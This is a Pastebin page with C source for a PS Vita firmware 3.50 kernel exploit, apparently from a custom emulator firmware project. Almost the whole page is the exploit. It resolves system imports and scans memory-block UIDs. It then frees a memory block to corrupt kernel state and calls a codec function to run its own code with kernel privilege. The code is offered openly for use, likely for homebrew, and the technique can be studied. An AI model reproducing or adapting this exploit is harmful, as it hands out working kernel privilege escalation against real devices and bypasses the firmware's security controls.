daily pastebin goal
73%
SHARE
TWEET

PS Vita 3.50 Kernel Exploit #4

a guest Apr 18th, 2015 3,433 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.         Custom Emulator Firmware
  3.         Copyright (C) 2012-2015, Total_Noob
  4.  
  5.         This program is free software: you can redistribute it and/or modify
  6.         it under the terms of the GNU General Public License as published by
  7.         the Free Software Foundation, either version 3 of the License, or
  8.         (at your option) any later version.
  9.  
  10.         This program is distributed in the hope that it will be useful,
  11.         but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.         MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13.         GNU General Public License for more details.
  14.  
  15.         You should have received a copy of the GNU General Public License
  16.         along with this program.  If not, see <http://www.gnu.org/licenses/>.
  17. */
  18.  
  19. #include <common.h>
  20.  
  21. #include "main.h"
  22. #include "libc.h"
  23. #include "utils.h"
  24.  
  25. #define MAX_UIDS 20
  26.  
  27. u32 address_list[MAX_UIDS];
  28.  
  29. int (* _sceKernelExitDeleteThread)(int status);
  30. int (* _sceUtility_private_7EBD6208)();
  31.  
  32. void RepairSysmem()
  33. {
  34. }
  35.  
  36. int load_thread()
  37. {
  38.         _sceUtility_private_7EBD6208();
  39.         return _sceKernelExitDeleteThread(0);
  40. }
  41.  
  42. void doExploit()
  43. {
  44.         /* Find imports in RAM */
  45.         void (* _sceKernelDcacheWritebackAll)() = (void *)FindImport("UtilsForUser", 0x79D1C3FA);
  46.         int (* _sceUtilityLoadModule)(int id) = (void *)FindImport("sceUtility", 0x2A2B3DE0);
  47.  
  48.         SceUID (* _sceKernelCreateThread)(const char *name, SceKernelThreadEntry entry, int initPriority, int stackSize, SceUInt attr, SceKernelThreadOptParam *option) = (void *)FindImport("ThreadManForUser", 0x446D8DE6);
  49.         int (* _sceKernelStartThread)(SceUID thid, SceSize arglen, void *argp) = (void *)FindImport("ThreadManForUser", 0xF475845D);
  50.         int (* _sceKernelWaitThreadEnd)(SceUID thid, SceUInt *timeout) = (void *)FindImport("ThreadManForUser", 0x278C0DF5);
  51.  
  52.         _sceKernelExitDeleteThread = (void *)FindImport("ThreadManForUser", 0x809CE29B);
  53.         _sceUtility_private_7EBD6208 = (void *)FindImport("sceUtility_private", 0x7EBD6208);
  54.  
  55.         SceUID (* _sceKernelAllocMemoryBlock)(const char *name, int type, u32 size, void *params) = (void *)FindImport("SysMemUserForUser", 0xFE707FDF);
  56.         int (* _sceKernelGetMemoryBlockAddr)(SceUID uid, void **ptr) = (void *)FindImport("SysMemUserForUser", 0xDB83A952);
  57.         int (* _sceKernelFreeMemoryBlock)(SceUID uid) = (void *)FindImport("SysMemUserForUser", 0x50F61D8A);
  58.  
  59.         if(!_sceKernelDcacheWritebackAll || !_sceUtilityLoadModule) ErrorFlashScreen();
  60.         if(!_sceKernelCreateThread || !_sceKernelStartThread || !_sceKernelWaitThreadEnd) ErrorFlashScreen();
  61.         if(!_sceKernelExitDeleteThread || !_sceUtility_private_7EBD6208) ErrorFlashScreen();
  62.         if(!_sceKernelAllocMemoryBlock || !_sceKernelGetMemoryBlockAddr || !_sceKernelFreeMemoryBlock) ErrorFlashScreen();
  63.  
  64.         /* Load required module */
  65.         _sceUtilityLoadModule(PSP_MODULE_NP_DRM);
  66.  
  67.         SceUID new_uid = _sceKernelAllocMemoryBlock("", PSP_SMEM_High, 1, NULL);
  68.  
  69.         SceUID uid_max = ((new_uid & 0xFFF00000) | 0x000FFFFF) + 0x100000;
  70.         SceUID uid_min = uid_max - 0x200000;
  71.  
  72.         int i;
  73.         SceUID uid;
  74.  
  75.         for(uid = uid_max, i = 0; uid > uid_min && i < MAX_UIDS; uid -= 2)
  76.         {
  77.                 u32 addr = 0;
  78.                 _sceKernelGetMemoryBlockAddr(uid, (void *)&addr);
  79.  
  80.                 if(addr & 0x80000000)
  81.                 {
  82.                         address_list[i] = addr;
  83.                         i++;
  84.                 }
  85.         }
  86.  
  87.         /* Load first module */
  88.         _sceUtilityLoadModule(PSP_MODULE_AV_G729);
  89.  
  90.         int (* _sceG729EncodeTermResource)() = (void *)FindImport("sceG729", 0x94714D50);
  91.         if(!_sceG729EncodeTermResource) ErrorFlashScreen();
  92.  
  93.         int free = 0;
  94.  
  95.         for(uid = uid_max, i = 0; uid > uid_min && i < MAX_UIDS; uid -= 2)
  96.         {
  97.                 u32 addr = 0;
  98.                 _sceKernelGetMemoryBlockAddr(uid, (void *)&addr);
  99.  
  100.                 if(addr & 0x80000000)
  101.                 {
  102.                         if(address_list[i] != addr)
  103.                         {
  104.                                 _sceKernelFreeMemoryBlock(uid);
  105.                                 free = 1;
  106.                                 break;
  107.                         }
  108.  
  109.                         i++;
  110.                 }
  111.         }
  112.  
  113.         if(!free) ErrorFlashScreen();
  114.  
  115.         /* Load second module */
  116. /*      SceUID thid = _sceKernelCreateThread("load_thread", load_thread, 0x10, 0x1000, 0, NULL);
  117.         _sceKernelStartThread(thid, 0, NULL);
  118.         _sceKernelWaitThreadEnd(thid, NULL);*/
  119.         _sceUtility_private_7EBD6208();
  120.  
  121.         _sceKernelDcacheWritebackAll();
  122.  
  123.         /* Execute with kernel privilege */
  124.         _sceG729EncodeTermResource();
  125.  
  126.         /* Restore registers */
  127.         asm("addiu $sp, $sp, -16\n");
  128.         asm("move $s0, $k1\n");
  129.  
  130.         /* Execute kernel function */
  131.         void (* execute)() = (void *)((u32)kernel_function | 0x80000000);
  132.         execute();
  133. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top